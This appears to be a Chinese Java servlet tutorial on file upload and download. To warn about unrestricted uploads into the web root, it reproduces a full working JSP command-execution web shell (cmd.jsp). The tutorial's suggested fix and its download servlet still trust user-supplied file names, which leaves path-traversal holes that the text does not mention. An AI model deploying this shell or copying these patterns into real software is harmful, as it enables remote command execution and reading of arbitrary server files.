上传
upload.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form action="upload" method="post" enctype="multipart/form-data">
<!--enctype="multipart/form-data"支持二进制上传数据,application/x-www-form-urlencoded支持文本传输-->
<input type="file" name="file"/>
<input type="file" name="file2">
<input type="submit" value="submit">
</form>
</body>
</html>
UploadServlet.java
package servlet;
import javax.servlet.ServletException;
import javax.servlet.annotation.MultipartConfig;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.Part;
import java.io.File;
import java.io.IOException;
import java.util.List;
@WebServlet(name = "UploadServlet",urlPatterns = {"/upload"})
@MultipartConfig
//该注解主要是为了辅助 Servlet 3.0 中 HttpServletRequest 提供的对上传文件的支持
public class UploadServlet extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
request.setCharacterEncoding("utf-8");
response.setContentType("text/html;charset=utf-8");
String path = request.getServletContext().getRealPath("");//获取服务器当前目录
List<Part> partList = (List<Part>)request.getParts();//获得
for(Part part: partList){
System.out.println(part.getName());
System.out.println(part.getSize());
System.out.println(part.getSubmittedFileName());//这个方法可以获取上传文件名
System.out.println(path);
part.write(path+ File.separator+part.getSubmittedFileName());//提交地址
}
}
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
doPost(request,response);
}
}
安全问题
上面这个上传文件直接保存在服务器当前目录,也就是你传个jsp文件也可以,上传成功,下面这个cmd.jsp就可以造成很大的破坏
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="cmd.jsp">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
具体,你可以在浏览器中输入 ,,, localhost:8080/upload/cmd.jsp,然后在form表单能输入指令ipconfig,可以获得服务器的ip等等。
所以,在上传文件的时候路径要改,part.write(“c:”+ File.separator+part.getSubmittedFileName());,直接将文件保存在c:盘
,当然,具体路径,你自便
下载
download.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<a href="download?fileName=gakki.jpg">gakki.jpg</a>
</body>
</html>
DownloadServlet
package servlet;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.OutputStream;
@WebServlet(name = "DownloadServlet",urlPatterns = {"/download"})
public class DownloadServlet extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
request.setCharacterEncoding("utf-8");
response.setContentType("text/html;charset=utf-8");
String fileName = request.getParameter("fileName");
FileInputStream fis = new FileInputStream("c:"+ File.separator+fileName);
response.setHeader("Content-Disposition", "attachment;filename="+fileName);
OutputStream os = response.getOutputStream();
byte[] buf = new byte[1024];
int l = -1;
while((l = fis.read(buf))!=-1){
os.write(buf,0,l);
os.flush();
}
}
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
doPost(request,response);
}
}